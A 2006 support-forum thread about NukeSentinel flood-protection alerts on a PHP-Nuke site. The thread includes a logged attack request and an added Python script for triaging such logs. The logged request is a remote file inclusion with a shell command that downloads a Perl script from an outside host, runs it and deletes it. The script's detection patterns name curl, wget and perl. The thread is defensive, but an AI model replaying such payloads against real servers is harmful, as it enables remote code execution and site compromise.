Ravens PHP Scripts: Forums
 

 

bsweb
Regular



Joined: Jun 19, 2006
Posts: 57

PostPosted: Thu Jul 13, 2006 10:16 am Reply with quote

I have the flood setting on with the POST set at 5 and the GET set at 3 seconds and I have been getting hundreds of activations over the past week or so since installing, although not as many now. I would say that 99.9% of activations report as follows:
Code:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Query String: www.mysite.org.uk/site/modules.php?name=Your_Account&stop=1
Get String: www.mysite.org.uk/site/modules.php?name=Your_Account&stop=1
Post String: www.mysite.org.uk/site/modules.php

Now to me it looks like a genuine flood because I get hardly any new members but I thought I better check, after all there must be some good reason it isn't set on by default.

Just today the flood setting caught the following, which was obviously very suspicious, but would it have been caught by ADMIN blocker or the sanity worm protection or any of the other blockers if I had the flood set to off? - just wondered

Code:
User Agent: Mozilla/5.0

Query String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php?phpbb_root_path=http://thw.kloeckner-web.de/tool25.jpg?&cmd=cd /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?
Get String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php?phpbb_root_path=http://thw.kloeckner-web.de/tool25.jpg?&cmd=cd /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?
Post String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php
Forwarded For: none
Client IP: none
Remote Address: 81.3.51.144
Remote Port: 58044
Request Method: GET
 
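An added example, not part of the original thread and not NukeSentinel's own code: a small Python triage of reports in the "Field: value" layout posted above, which flags parameters carrying a remote URL or shell syntax regardless of request rate. The host names, sample reports and finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)   # value is itself a URL
PATH_PARAM = re.compile(r"(?:_path|_root|_dir)$", re.I)   # name suggests an include path
SHELL_HINT = re.compile(r"[;|`]|\$\(|\b(?:curl|wget|perl)\b", re.I)

# Constructed sample reports in the layout shown in the post above.
NORMAL = """User Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Get String: www.example.invalid/site/modules.php?name=Your_Account&stop=1
Request Method: GET"""
REDIRECT = """User Agent: Mozilla/5.0
Get String: www.example.invalid/site/index.php?url=http://www.example.invalid/news
Request Method: GET"""
INCLUDE = """User Agent: Mozilla/5.0
Get String: www.example.invalid/site/modules/Forums/admin/admin_users.php?phpbb_root_path=http://files.example.invalid/tool.jpg?&cmd=cd /tmp/;ls
Request Method: GET"""


def parse_report(text):
    """Turn the 'Field: value' lines of one report into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return fields


def classify(report_text):
    """Return sorted findings for the parameters in the report's Get String."""
    get_string = parse_report(report_text).get("Get String", "")
    _, _, query = get_string.partition("?")
    findings = set()
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote_plus(value)
        if REMOTE_URL.match(value):
            findings.add("remote-url-in-parameter")
            if PATH_PARAM.search(name):
                findings.add("remote-url-in-path-parameter")
        if SHELL_HINT.search(value):
            findings.add("shell-syntax-in-parameter")
    return sorted(findings)


if __name__ == "__main__":
    for label, report in (("normal", NORMAL), ("redirect", REDIRECT), ("include", INCLUDE)):
        print(label, classify(report))
```

A URL in an ordinary parameter (the redirect sample) yields only the weakest finding, so it can be reviewed rather than blocked outright.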
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

PostPosted: Thu Jul 13, 2006 11:45 am Reply with quote

Your site is being attacked by a well known exploit that doesn't work any more.
Make sure you upgrade to the latest Sentinel version.
 
bsweb







PostPosted: Thu Jul 13, 2006 12:04 pm Reply with quote

Thanks Guardian2003

Should I upgrade now or might it be better to wait for the next RavenNuke76, which is due out anytime I believe?

Could you also advise where I can download v5? I can't seem to find it.

Cheers
 
technocrat
Life Cycles Becoming CPU Cycles



Joined: Jul 07, 2005
Posts: 511

PostPosted: Thu Jul 13, 2006 2:08 pm Reply with quote

You should upgrade

Guardian2003







PostPosted: Thu Jul 13, 2006 2:58 pm Reply with quote

The latest Sentinel download can be found on the news article on the front page of this site.
I would definitely upgrade Sentinel now as there are some important improvements.
 
All times are GMT - 6 Hours
 